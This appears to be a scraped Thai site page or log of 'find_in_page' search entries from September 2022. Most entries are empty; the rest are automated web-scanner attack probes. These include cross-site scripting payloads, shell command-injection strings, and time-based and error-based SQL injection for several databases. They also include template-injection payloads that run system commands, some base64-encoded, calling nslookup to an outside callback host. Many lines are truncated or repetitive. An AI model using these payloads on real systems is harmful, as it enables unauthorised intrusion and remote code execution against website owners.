find_in_page    ',netsparker(0x01F04D),' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    \';netsparker(0x01F04B);/// (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    "+netsparker(0x01F049)+" (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '+netsparker(0x01F047)+' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    */netsparker(0x01F045);/* (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    javascript:netsparker(0x01F041) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    "> (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '> (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1 ns=netsparker(0x01F006) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    |ping -n 25 127.0.0.1 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '" ns=netsparker(0x01EFFE) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ping -w 25 127.0.0.1 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ping -n 25 127.0.0.1 (13 กันยายน 2565)
find_in_page    data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDFFRkZCKTwvc2NyaXB0Pg== (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ping -w 25 127.0.0.1 & (13 กันยายน 2565)
find_in_page    %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x01EFF9%29%3C%2FscRipt%3E (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    &ping -w 25 127.0.0.1 & (13 กันยายน 2565)
find_in_page    '"--> (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    N3TSP4RKE2 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '&ping -w 25 127.0.0.1 &' (13 กันยายน 2565)
find_in_page    nxtspxrkex (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    n3tsp4rke2 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    "&ping -w 25 127.0.0.1 &" (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ping -n 25 127.0.0.1 & (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    & ping -n 25 127.0.0.1 & (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '& ping -n 25 127.0.0.1 & (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    "& ping -n 25 127.0.0.1 & (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    |expr${IFS}268409241${IFS}-${IFS}27957 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    expr 268409241 - 61648 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    expr 268409241 - 73865; (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1;expr 268409241 - 13140;x (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1';expr 268409241 - 39477;' (13 กันยายน 2565)
find_in_page    1";expr 268409241 - 66790;" (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    | SET /A 0xFFF9999-53089 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    SET /A 0xFFF9999-34561 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    SET /A 0xFFF9999-52509 & (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    & SET /A 0xFFF9999-19711 & (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '& SET /A 0xFFF9999-3883 & (13 กันยายน 2565)
find_in_page    'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 37d0f3f6-1303-41b8-a015-c095e8a4d250 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    "& SET /A 0xFFF9999-67014 & (13 กันยายน 2565)
find_in_page    ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 29b5f85f-5fb4-406d-b893-f780e4436755 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* e0958596-006b-49f5-8dc3-2f236ee9812e */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 0fab47ff-28b1-4aec-9bb0-816d25b75dec */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* bcc0d876-a554-452d-aff3-19702d9edf84 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 5db14393-f21b-4aa1-bea5-dad17a396738 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 36fa2868-f5e7-4107-8786-5ac27eda1bed */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* a33a4d6f-02e4-4ec4-a48b-229dbea07a8f */ (13 กันยายน 2565)
find_in_page    1));SELECT pg_sleep(25)-- /* 65d355ff-2780-4612-a914-8a69e015492b */ (13 กันยายน 2565)
(select count(*),conca'>
find_in_page    (13 กันยายน 2565)
find_in_page    1'));SELECT pg_sleep(25)-- /* e7f065d7-5a55-4d94-aecf-c7411931a733 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1');SELECT pg_sleep(25)-- /* dc78f507-2a0d-49e9-aeff-74429c455ded */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1);SELECT pg_sleep(25)-- /* a4471f63-3101-45dc-b0f4-eac7241d5691 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    SELECT pg_sleep(25)-- /* 5335e37a-d337-4a2c-b22e-a465944126dd */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1;SELECT pg_sleep(25)-- /* b30d08d0-4a57-405f-8b37-741d5f9ce110 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
(SELECT COUNT(*),CONCAT'>
find_in_page    (13 กันยายน 2565)
find_in_page    1';SELECT pg_sleep(25)-- /* f875cc57-b517-4561-9e20-24f47c8d31d4 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* ecb27848-cbba-4f78-a99b-09b01459bb (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* eb6f121c-1d3c-4d4d-85aa-93def42 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* e205f421-f276-485e-b7ad-d21c2f6cfe0e */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ((select sleep(25)))a-- 1 /* c35cdd22-22fb-4be1-ae33-3cc062fd3d6a */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 32ea2626-d600-4f7c-a999-796dd78d1fcd */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 5e30b8dc-5a59-4ab5-b2eb-2f88b22fa83e */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 18a7a266-2495-4af4-bbf5-120fd3ad75a8 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* b3fd3c12-9762-44c1-8e75-53807740c168 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 66bd72f7-638e-4876-814b-5050039b40d2 */ (13 กันยายน 2565)
(SELECT '>
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* a6f83d4c-13a3-49d7-9d70-04a45daa1de5 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1)) WAITFOR DELAY '0:0:25'-- /* 8710e6bd-9679-418b-80a0-ab54fa876f58 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ')) WAITFOR DELAY '0:0:25'-- /* 5606c6f5-6246-433e-9d80-141f080c540a */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ') WAITFOR DELAY '0:0:25'-- /* e6502818-5daf-40ae-a7c0-2bb4da8256aa */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1) WAITFOR DELAY '0:0:25'-- /* e5c0fbb8-b522-42ff-8f7a-e49451c1b460 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    WAITFOR DELAY '0:0:25'-- /* b4f5def1-4c1f-4217-b5e2-e0eb9c0cd06c */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1 WAITFOR DELAY '0:0:25'-- /* be58e106-7a28-4c84-84d1-1ecb761c1656 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ' WAITFOR DELAY '0:0:25'-- /* ec47fa99-82fc-428c-9684-ee3ba131d003 */ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ' UNION ALL SELECT CHAR(95)||CHAR(33)||CHAR(64)||CHAR(54)||CHAR(100)||CHAR(105)||CHAR(108)||CHAR(101)||CHAR(109)||CHAR(109)||CHAR(97) FROM INFORMATION_SCHEMA.SYSTEM_USERS-- zDyA (13 กันยายน 2565)
find_in_page    -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORM (13 กันยายน 2565)
find_in_page    -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR (13 กันยายน 2565)
find_in_page    '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' (13 กันยายน 2565)
find_in_page    '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' (13 กันยายน 2565)
find_in_page    (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) (13 กันยายน 2565)
find_in_page    1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 (13 กันยายน 2565)
find_in_page    -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCH (13 กันยายน 2565)
find_in_page    (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. (13 กันยายน 2565)
find_in_page    '+NSFTW+' (13 กันยายน 2565)
find_in_page    NSFTW (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFOR (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    %27 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgbnRseXB6Y2JzbW10aWRtZXRlY2hmZWVwaWd6Mi1lcGR4bjR0OGVnbnNfcy5yODcubWU=')).read() (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    require 'resolv';Resolv.getaddress ("ntlypzcbsmgzsq704kfgcetqknx865ulk9wsls5x".concat "-oe.r87.me") (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup ntlypzcbsmywskfkuppz7m0c8wgipo1xqclgjd8r"+"yuy.r87.me") } (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<(09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgbnRseXB6Y2JzbW5qamZsMXZidms2dGs4dzd4bnpseG5mZGRyM3poZnB0bS5yODcubWU=')})).to_s}" %> (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup ntlypzcbsmnlbkvqyse0ps4d2hjejzdozdvecymc"~"c1u.r87.me")}} (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    {php}Smarty_Resource::parseResourceName(system("nslookup ntlypzcbsmkhypt8rl9lgfxixospjvv-0izojt_d"."_va.r87.me"),'b');{/php} (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgbnRseXB6Y2JzbTFmeHB2MS1xaWJpdndodGloLWM1aXpub2o0ZmtmZ2J4Zy5yODcubWU=','base64').toString()) %> (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgbnRseXB6Y2JzbXBqcTd2dnYtZmJ6bmt6dHp4Z2IwdmM1N2kxNXl3NGMzdS5yODcubWU=','base64').toString()) (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnYm5Sc2VYQjZZMkp6Yldod1pIRjVkREJrYW5ka2JIZDN (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgbnRseXB6Y2JzbW41bHJ2b3ZmX3pkcG9qenVuaGVnaDhjcjNvanluaHFzOC5yODcubWU=')).read()}} (09 กันยายน 2565)
